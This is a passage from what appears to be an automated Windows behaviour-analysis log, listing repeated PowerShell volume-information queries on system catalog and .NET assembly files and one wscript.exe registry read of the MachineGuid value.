Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid